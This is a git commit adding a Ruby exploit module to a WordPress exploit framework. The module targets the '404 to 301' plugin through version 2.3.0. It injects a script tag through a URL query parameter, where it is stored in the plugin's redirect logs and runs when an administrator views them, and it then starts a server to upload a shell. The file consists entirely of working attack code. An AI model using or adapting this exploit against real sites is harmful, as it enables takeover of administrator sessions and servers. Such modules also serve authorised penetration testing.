Add 404 to 301 stored XSS module

rastating · rastating · commit 4ae51af8d42c · 2016-09-02T23:41:03.000+01:00
diff --git a/modules/exploits/four04_to_three01_stored_xss_shell_upload.rb b/modules/exploits/four04_to_three01_stored_xss_shell_upload.rb
@@ -0,0 +1,48 @@
+class Wpxf::Exploit::Four04ToThree01StoredXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::Xss
+
+  def initialize
+    super
+
+    update_info(
+      name: '404 to 301 <= 2.3.0 XSS Shell Upload',
+      author: [
+        'ldionmarcil',                    # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8611'],
+        ['URL', 'https://gist.github.com/ldionmarcil/6793df929449f8781bb1e213d7e75e23']
+      ],
+      date: 'Aug 27 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('404-to-301', '2.3.1')
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Storing script...'
+    res = execute_get_request(
+      url: normalize_uri(full_uri, "?p=#{Utility::Text.rand_numeric(11)}\"><script>#{xss_include_script}</script>")
+    )
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+
+    emit_success 'Script stored and will be executed when a user views the 404 to 301 redirect logs'
+    start_http_server
+
+    xss_shell_success
+  end
+end
